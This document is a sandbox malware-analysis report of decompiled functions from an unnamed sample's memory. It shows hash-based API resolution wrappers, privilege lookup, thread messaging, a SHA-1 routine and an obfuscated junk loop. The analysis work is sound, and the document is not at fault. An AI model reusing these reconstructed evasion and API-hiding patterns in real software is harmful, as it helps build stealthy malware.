                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID: &E9
                            • API String ID: 1279760036-294309896
                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction ID: db6f757f6def1f03c894a00a3443b856267733ec0945bac7e24aede24848095b
                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                            • Instruction Fuzzy Hash: 1CE012B2200208ABDB14EF99CC41EA777ACAF88754F118558BA1D5B242C630F9108AF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 208 388308-38831f 209 388328-38835a call 39c9f0 call 38ace0 call 394e40 208->209 210 388323 call 39be50 208->210 217 38835c-38836e PostThreadMessageW 209->217 218 38838e-388392 209->218 210->209 219 38838d 217->219 220 388370-38838a call 38a470 217->220 219->218 220->219
                            C-Code - Quality: 74%
                            			E00388308(void* __eax, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
                            				char _v67;
                            				char _v68;
                            				void* _t16;
                            				int _t17;
                            				long _t27;
                            				int _t32;
                            				void* _t35;
                            				void* _t37;
                            				void* _t42;
                            
                            				_t42 = __eflags;
                            				asm("lds edx, [ebp-0x75]");
                            				_t35 = _t37;
                            				_v68 = 0;
                            				E0039BE50( &_v67, 0, 0x3f);
                            				E0039C9F0( &_v68, 3);
                            				_t16 = E0038ACE0(_t42, _a4 + 0x1c,  &_v68); // executed
                            				_t17 = E00394E40(_a4 + 0x1c, _t16, 0, 0, 0xc4e7b6d6);
                            				_t32 = _t17;
                            				if(_t32 != 0) {
                            					_t27 = _a8;
                            					_t17 = PostThreadMessageW(_t27, 0x111, 0, 0); // executed
                            					_t44 = _t17;
                            					if(_t17 == 0) {
                            						_t17 =  *_t32(_t27, 0x8003, _t35 + (E0038A470(_t44, 1, 8) & 0x000000ff) - 0x40, _t17);
                            					}
                            				}
                            				return _t17;
                            			}

                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0038836A
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: d2c870aafc8f5c1776de9bc77c66467071d44163b5cb332586659da32af26e77
                            • Instruction ID: 798ecbb0092544416f2faad39ce3a5c206cb96aa0238c53cdfed4d7291c6121e
                            • Opcode Fuzzy Hash: d2c870aafc8f5c1776de9bc77c66467071d44163b5cb332586659da32af26e77
                            • Instruction Fuzzy Hash: 5001B531A4022876EB22A7A49C43FFE7B6CAB41F51F054159FF04BE1C2D6E4690647E5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 223 388310-38835a call 39be50 call 39c9f0 call 38ace0 call 394e40 232 38835c-38836e PostThreadMessageW 223->232 233 38838e-388392 223->233 234 38838d 232->234 235 388370-38838a call 38a470 232->235 234->233 235->234
                            C-Code - Quality: 82%
                            			E00388310(void* __eflags, intOrPtr _a4, long _a8) {
                            				char _v67;
                            				char _v68;
                            				void* _t12;
                            				intOrPtr* _t13;
                            				int _t14;
                            				long _t21;
                            				intOrPtr* _t25;
                            				void* _t26;
                            				void* _t30;
                            
                            				_t30 = __eflags;
                            				_v68 = 0;
                            				E0039BE50( &_v67, 0, 0x3f);
                            				E0039C9F0( &_v68, 3);
                            				_t12 = E0038ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
                            				_t13 = E00394E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                            				_t25 = _t13;
                            				if(_t25 != 0) {
                            					_t21 = _a8;
                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                            					_t32 = _t14;
                            					if(_t14 == 0) {
                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0038A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                            					}
                            					return _t14;
                            				}
                            				return _t13;
                            			}

                            APIs
                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0038836A
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: MessagePostThread
                            • String ID:
                            • API String ID: 1836367815-0
                            • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                            • Instruction ID: b6726ec4b88f5ebfec65997c577f55f163da36a6080d4115f768fbccb8f626c6
                            • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                            • Instruction Fuzzy Hash: 5C018F31A8032877EB22B6949C03FBE776C6B40F51F050159FF04BE1C2EAE4690647E6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 262 39a660-39a691 call 39af50 RtlFreeHeap
                            C-Code - Quality: 100%
                            			E0039A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                            				char _t10;
                            				void* _t15;
                            
                            				_t3 = _a4 + 0xc74; // 0xc74
                            				E0039AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                            				return _t10;
                            			}

                            APIs
                            • RtlFreeHeap.NTDLL(00000060,00389CE3,?,?,00389CE3,00000060,00000000,00000000,?,?,00389CE3,?,00000000), ref: 0039A68D
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction ID: 517bc75e9d175dcd2887ea4b6e4710446d04681907aefbff97a5a246cf7e3512
                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                            • Instruction Fuzzy Hash: 77E01AB12002046BDB14DF59CC45EA777ACAF88750F014554B91D5B241C630E9108AF0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 265 39a7c0-39a7f4 call 39af50 LookupPrivilegeValueW
                            C-Code - Quality: 100%
                            			E0039A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                            				WCHAR* _t9;
                            				int _t10;
                            				WCHAR* _t12;
                            				struct _LUID* _t13;
                            				void* _t15;
                            
                            				E0039AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                            				_t13 = _a16;
                            				_t9 = _a12;
                            				_t12 = _a8;
                            				_t10 = LookupPrivilegeValueW(_t12, _t9, _t13); // executed
                            				return _t10;
                            			}

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0038F1C2,0038F1C2,0000003C,00000000,?,00389D55), ref: 0039A7F0
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction ID: ef62b092ce1ea413f230aab7d92d4c32ed5a81748a87165b9d9eecce517f23d8
                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                            • Instruction Fuzzy Hash: DDE01AB12002086BDB10DF49CC85EE737ADAF89750F018154BA0D5B241C930E8108BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0039A6A0(intOrPtr _a4, int _a8) {
                            				void* _t10;
                            
                            				_t5 = _a4;
                            				E0039AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                            				ExitProcess(_a8);
                            			}

                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0039A6C8
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction ID: ff057b98d55bb89f50a351848877bf06dc9ba831ba07f21e38b98ecc80cc60d6
                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                            • Instruction Fuzzy Hash: 49D017726002187BDA20EB98CC85FE777ACDF497A0F0181A5BA1D6B242C531BA008AE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 62%
                            			E0039A652(void* __eax, char __ebx, char* __edi, intOrPtr _a5, void* _a9, long _a13, void* _a17) {
                            				signed int _v374149405;
                            				char _t14;
                            				signed int _t24;
                            
                            				asm("out dx, eax");
                            				_v374149405 = _v374149405 ^ _t24;
                            				asm("loop 0x4a");
                            				 *__edi = __ebx;
                            				_push(_t24);
                            				_t11 = _a5;
                            				_t5 = _t11 + 0xc74; // 0xc74
                            				E0039AF50(__edi, _a5, _t5,  *((intOrPtr*)(_a5 + 0x10)), 0, 0x35);
                            				_t14 = RtlFreeHeap(_a9, _a13, _a17); // executed
                            				return _t14;
                            			}

                            APIs
                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0039A6C8
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID:
                            • API String ID: 621844428-0
                            • Opcode ID: 561a558681fa3a41e3b422ec0f9d5bec744954e3cc63d7ab04dc55ad1bc1c52f
                            • Instruction ID: 79a4b6b27e08859f10c7bbfbd6b482ea1fe0cf983c69fb2e47e20d71a21f2500
                            • Opcode Fuzzy Hash: 561a558681fa3a41e3b422ec0f9d5bec744954e3cc63d7ab04dc55ad1bc1c52f
                            • Instruction Fuzzy Hash: 93E08C75A096426BEB02DF348C86A877F648F66340F2885A8A8996B542C530A2058BE2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 47%
                            			E0039A765(WCHAR* __eax, void* __ebx, struct _LUID* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a96) {
                            				intOrPtr _v0;
                            				WCHAR* _t16;
                            				int _t17;
                            				WCHAR* _t24;
                            				void* _t33;
                            				void* _t34;
                            				intOrPtr* _t36;
                            				void* _t38;
                            				void* _t42;
                            
                            				asm("adc esp, edi");
                            				_t1 =  &_a96;
                            				_t16 =  *_t1;
                            				 *_t1 = __eax;
                            				if(__eflags > 0) {
                            					_t17 = LookupPrivilegeValueW(_t24, _t16, __edx); // executed
                            					return _t17;
                            				} else {
                            					_t18 = _v0;
                            					_t8 = _t18 + 0xc88; // 0xd8c
                            					_t36 = _t8;
                            					E0039AF50(_t33, _v0, _t36,  *((intOrPtr*)(_t18 + 0xa14)), 0, 0x39);
                            					return  *((intOrPtr*)( *_t36))(_a4, _a8, _a12, _a16, _a20, _a24, _t34, _t38, _t42);
                            				}
                            			}

                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0038F1C2,0038F1C2,0000003C,00000000,?,00389D55), ref: 0039A7F0
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: 280914c5556fbf1310149cc9cc0bea5dbcd9d4911544087be0d8331a4a847cc2
                            • Instruction ID: d9f12ad449d04811a4dd6a1ddbbd041d90e20622d824765edf3de75cf312d28a
                            • Opcode Fuzzy Hash: 280914c5556fbf1310149cc9cc0bea5dbcd9d4911544087be0d8331a4a847cc2
                            • Instruction Fuzzy Hash: BCC080710456855E9711D6947C41C57775CFEC41043144659FC4841101D6218810C6E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E00389E50(signed int* _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				char _v304;
                            				signed char* _t277;
                            				signed int* _t278;
                            				signed int _t279;
                            				signed int _t285;
                            				signed int _t288;
                            				signed int _t292;
                            				signed int _t295;
                            				signed int _t299;
                            				signed int _t303;
                            				signed int _t305;
                            				signed int _t311;
                            				signed int _t318;
                            				signed int _t320;
                            				signed int _t323;
                            				signed int _t325;
                            				signed int _t334;
                            				signed int _t340;
                            				signed int _t341;
                            				signed int _t346;
                            				signed int _t353;
                            				signed int _t357;
                            				signed int _t358;
                            				signed int _t362;
                            				signed int _t365;
                            				signed int _t369;
                            				signed int _t370;
                            				signed int _t399;
                            				signed int _t404;
                            				signed int _t410;
                            				signed int _t413;
                            				signed int _t420;
                            				signed int _t423;
                            				signed int _t432;
                            				signed int _t434;
                            				signed int _t437;
                            				signed int _t445;
                            				signed int _t459;
                            				signed int _t462;
                            				signed int _t463;
                            				signed int _t464;
                            				signed int _t470;
                            				signed int _t478;
                            				signed int _t479;
                            				signed int* _t480;
                            				signed int* _t481;
                            				signed int _t488;
                            				signed int _t491;
                            				signed int _t496;
                            				signed int _t499;
                            				signed int _t502;
                            				signed int _t505;
                            				signed int _t506;
                            				signed int _t510;
                            				signed int _t522;
                            				signed int _t525;
                            				signed int _t532;
                            				void* _t536;
                            
                            				_t481 = _a4;
                            				_t353 = 0;
                            				_t2 =  &(_t481[7]); // 0x1b
                            				_t277 = _t2;
                            				do {
                            					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                            					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                            					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                            					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                            					_t353 = _t353 + 4;
                            					_t277 =  &(_t277[0x10]);
                            				} while (_t353 < 0x10);
                            				_t278 =  &_v304;
                            				_v8 = 0x10;
                            				do {
                            					_t399 =  *(_t278 - 0x18);
                            					_t459 =  *(_t278 - 0x14);
                            					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                            					asm("rol ecx, 1");
                            					asm("rol ebx, 1");
                            					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                            					_t278[8] = _t357;
                            					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                            					_t278 =  &(_t278[4]);
                            					asm("rol ebx, 1");
                            					asm("rol edx, 1");
                            					_t46 =  &_v8;
                            					 *_t46 = _v8 - 1;
                            					_t278[6] = _t318 ^ _t399;
                            					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                            				} while ( *_t46 != 0);
                            				_t320 =  *_t481;
                            				_t279 = _t481[1];
                            				_t358 = _t481[2];
                            				_t404 = _t481[3];
                            				_v12 = _t320;
                            				_v16 = _t481[4];
                            				_v8 = 0;
                            				do {
                            					asm("rol ebx, 0x5");
                            					_t462 = _v8;
                            					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                            					_t323 = _v12;
                            					asm("ror eax, 0x2");
                            					_v16 = _t404;
                            					_v12 = _t488;
                            					asm("rol esi, 0x5");
                            					_v8 = _t358;
                            					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                            					_t491 = _t279;
                            					asm("ror ebx, 0x2");
                            					_v16 = _v8;
                            					_t362 = _v12;
                            					_v8 = _t323;
                            					_t325 = _v8;
                            					_v12 = _t410;
                            					asm("rol edx, 0x5");
                            					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                            					_t413 = _v12;
                            					_v16 = _t491;
                            					asm("ror ecx, 0x2");
                            					_v8 = _t362;
                            					_v12 = _t285;
                            					asm("rol eax, 0x5");
                            					_v16 = _t325;
                            					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                            					_t358 = _v12;
                            					_t288 = _v8;
                            					asm("ror edx, 0x2");
                            					_v8 = _t413;
                            					_v12 = _t496;
                            					asm("rol esi, 0x5");
                            					_v16 = _t288;
                            					_t279 = _v12;
                            					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                            					_t404 = _v8;
                            					asm("ror ecx, 0x2");
                            					_t463 = _t462 + 5;
                            					_t320 = _t499;
                            					_v12 = _t320;
                            					_v8 = _t463;
                            				} while (_t463 < 0x14);
                            				_t464 = 0x14;
                            				do {
                            					asm("rol esi, 0x5");
                            					asm("ror eax, 0x2");
                            					_v16 = _t404;
                            					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                            					_t334 = _v12;
                            					_v12 = _t502;
                            					asm("rol esi, 0x5");
                            					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                            					asm("ror ebx, 0x2");
                            					_t505 = _t279;
                            					_v16 = _t358;
                            					_t365 = _v12;
                            					_v12 = _t420;
                            					asm("rol edx, 0x5");
                            					asm("ror ecx, 0x2");
                            					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                            					_t423 = _v12;
                            					_v8 = _t334;
                            					_v8 = _t365;
                            					_v12 = _t292;
                            					asm("rol eax, 0x5");
                            					_t464 = _t464 + 5;
                            					_t358 = _v12;
                            					asm("ror edx, 0x2");
                            					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                            					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                            					_t295 = _v8;
                            					_v8 = _t423;
                            					_v12 = _t506;
                            					asm("rol esi, 0x5");
                            					_t404 = _v8;
                            					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                            					_v16 = _t295;
                            					_t279 = _v12;
                            					asm("ror ecx, 0x2");
                            					_v12 = _t499;
                            				} while (_t464 < 0x28);
                            				_v8 = 0x28;
                            				do {
                            					asm("rol esi, 0x5");
                            					_v16 = _t404;
                            					asm("ror eax, 0x2");
                            					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                            					_t470 = _v12;
                            					_v12 = _t510;
                            					asm("rol esi, 0x5");
                            					_t340 = _v8;
                            					asm("ror edi, 0x2");
                            					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                            					_v16 = _t358;
                            					_t369 = _v12;
                            					_v12 = _t432;
                            					asm("rol edx, 0x5");
                            					_v8 = _t279;
                            					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                            					asm("ror ecx, 0x2");
                            					_v16 = _v8;
                            					_t299 = _v12;
                            					_v8 = _t470;
                            					_v12 = _t434;
                            					asm("rol edx, 0x5");
                            					asm("ror eax, 0x2");
                            					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                            					_v16 = _v8;
                            					_t437 = _t369;
                            					_t358 = _v12;
                            					_v8 = _t437;
                            					_v12 = _t522;
                            					asm("rol esi, 0x5");
                            					_v16 = _v8;
                            					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                            					_t404 = _t299;
                            					_t279 = _v12;
                            					asm("ror ecx, 0x2");
                            					_v12 = _t499;
                            					_t341 = _t340 + 5;
                            					_v8 = _t341;
                            				} while (_t341 < 0x3c);
                            				_t478 = 0x3c;
                            				_v8 = 0x3c;
                            				do {
                            					asm("rol esi, 0x5");
                            					_t479 = _v8;
                            					asm("ror eax, 0x2");
                            					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                            					_t346 = _v12;
                            					_v16 = _t404;
                            					_v12 = _t525;
                            					asm("rol esi, 0x5");
                            					asm("ror ebx, 0x2");
                            					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                            					_v16 = _t358;
                            					_t370 = _v12;
                            					_v12 = _t445;
                            					asm("rol edx, 0x5");
                            					_v16 = _t279;
                            					asm("ror ecx, 0x2");
                            					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                            					_t404 = _v12;
                            					_v12 = _t303;
                            					asm("rol eax, 0x5");
                            					_v16 = _t346;
                            					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                            					_t305 = _t370;
                            					_v8 = _t346;
                            					asm("ror edx, 0x2");
                            					_v8 = _t370;
                            					_t358 = _v12;
                            					_v12 = _t532;
                            					asm("rol esi, 0x5");
                            					_t478 = _t479 + 5;
                            					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                            					_v16 = _t305;
                            					_t279 = _v12;
                            					asm("ror ecx, 0x2");
                            					_v8 = _t404;
                            					_v12 = _t499;
                            					_v8 = _t478;
                            				} while (_t478 < 0x50);
                            				_t480 = _a4;
                            				_t480[2] = _t480[2] + _t358;
                            				_t480[3] = _t480[3] + _t404;
                            				_t311 = _t480[4] + _v16;
                            				 *_t480 =  *_t480 + _t499;
                            				_t480[1] = _t480[1] + _t279;
                            				_t480[4] = _t311;
                            				_t480[0x17] = 0;
                            				return _t311;
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (
                            • API String ID: 0-3887548279
                            • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                            • Instruction ID: 7c98713e811ffec1c435ad361e458ca92b5d39f6397a55300cb108d8b1d59546
                            • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                            • Instruction Fuzzy Hash: CA021CB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 43%
                            			E0039EB5F(signed char __ebx, signed int __ecx, signed int __edx, void* __esi) {
                            				char _v3;
                            				void* _v5;
                            				signed int _t36;
                            				signed int _t37;
                            				signed int _t41;
                            				signed int _t43;
                            				signed int _t44;
                            				void* _t45;
                            				signed int _t61;
                            				signed int _t63;
                            				signed int _t69;
                            				signed int _t73;
                            				signed int _t88;
                            				char* _t91;
                            				signed int _t92;
                            				signed int _t93;
                            				signed int _t95;
                            				signed int _t96;
                            				signed int _t101;
                            
                            				_t83 = __esi;
                            				_t69 = __edx;
                            				_t61 = __ecx;
                            				_t52 = __ebx;
                            				_t88 = _t92;
                            				goto L1;
                            				do {
                            					do {
                            						do {
                            							do {
                            								do {
                            									do {
                            										do {
                            											do {
                            												do {
                            													do {
                            														do {
                            															do {
                            																do {
                            																	do {
                            																		do {
                            																			do {
                            																				do {
                            																					do {
                            																						do {
                            																							do {
                            																								do {
                            																									L1:
                            																									asm("rcr dword [0x1926d0cc], 0x2");
                            																									asm("adc al, [0x24680be1]");
                            																									_t61 = _t61 -  *0xc8617cf6;
                            																									_push( *0x90b3d699);
                            																								} while (_t61 >= 0);
                            																								_t93 =  *0x2d9e7c7d * 0x9001;
                            																								 *0x663386e4 =  *0x663386e4 - _t69;
                            																								_t61 = _t61 & 0x000000a0;
